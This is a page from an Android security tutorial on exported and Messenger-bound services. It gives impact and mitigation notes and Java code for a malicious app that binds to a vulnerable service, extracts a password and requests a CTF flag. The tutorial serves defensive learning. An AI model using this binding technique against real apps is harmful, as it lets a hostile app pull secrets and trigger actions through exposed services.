Services

Services are used for long running tasks which should be run in background.

Ex: Downloading/Uploading a large size file, Media Controls.

Exported Service

Like Activities exported services can also be started by malicious apps, depending on how the service is using the intent received from malicious application impact can vary.

Impact: Malicious apps can start vulnerable app's services.

Mitigation: Do not export the services, Use Permissions to safeguard services from being used by malicious apps.

Exported Bound Service using Messenger

Bound services are services which can send & receive data from other apps which binds to the service.

The service which returns messenger instance in onBind method of service implementation are generally vulnerable to this attack method.

   public static String flag27password="";
    Messenger serviceMessenger;
    Messenger receiveMessenger = new Messenger(new receiveHandler());
    ServiceConnection serviceConnection = new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service) {
            try {
                serviceMessenger = new Messenger(service);
                Message msg =  Message.obtain((Handler)null,1);
                Bundle bundle = new Bundle();
                bundle.putString("echo","give flag");
                msg.setData(bundle);
                serviceMessenger.send(msg);
                msg =  Message.obtain((Handler)null,2);
                msg.obj = bundle;
                msg.setData(bundle);
                msg.replyTo = receiveMessenger;
                Log.i("TEST","Sending msg");
                serviceMessenger.send(msg);
            }catch (Exception ex){
                Log.i("EXCEPTION",ex.toString());
            }
        }
        @Override
        public void onServiceDisconnected(ComponentName name) {
            Log.i("TEST","Service disconnected");
        }
    };
    public class receiveHandler extends Handler {
        @Override
        public void handleMessage(@NonNull Message msg) {
            super.handleMessage(msg);
            Bundle bundle = msg.getData();
            for (String key : bundle.keySet()) {
                Object value = bundle.get(key);
                if(key.equals("password")){
                    flag27password = value.toString();
                    Message msg1 =  Message.obtain((Handler)null,3);
                    Bundle bundle1 = new Bundle();
                    bundle1.putString("echo","give flag");
                    bundle1.putString("password",flag27password);
                    msg1.setData(bundle1);
                    msg1.replyTo = new Messenger(new receiveHandler());
                    Log.i("TEST","Sending Password " + flag27password);
                    try {
                        serviceMessenger.send(msg1);
                    }catch (Exception e){
                        Log.i("EXCEPTION",e.toString());
                    }
                }
                Log.i("BundleContents", "Key: " + key + ", Value: " + value);
            }

        }
    }

Impact: Malicious Apps can bind & communicate to vulnerable services using message handlers.

Mitigation: Use Local Binders, Do not allow external app to bind to services, Use permissions to protect services.

PreviousBroadcasts NextCheatsheet

Last updated 1 year ago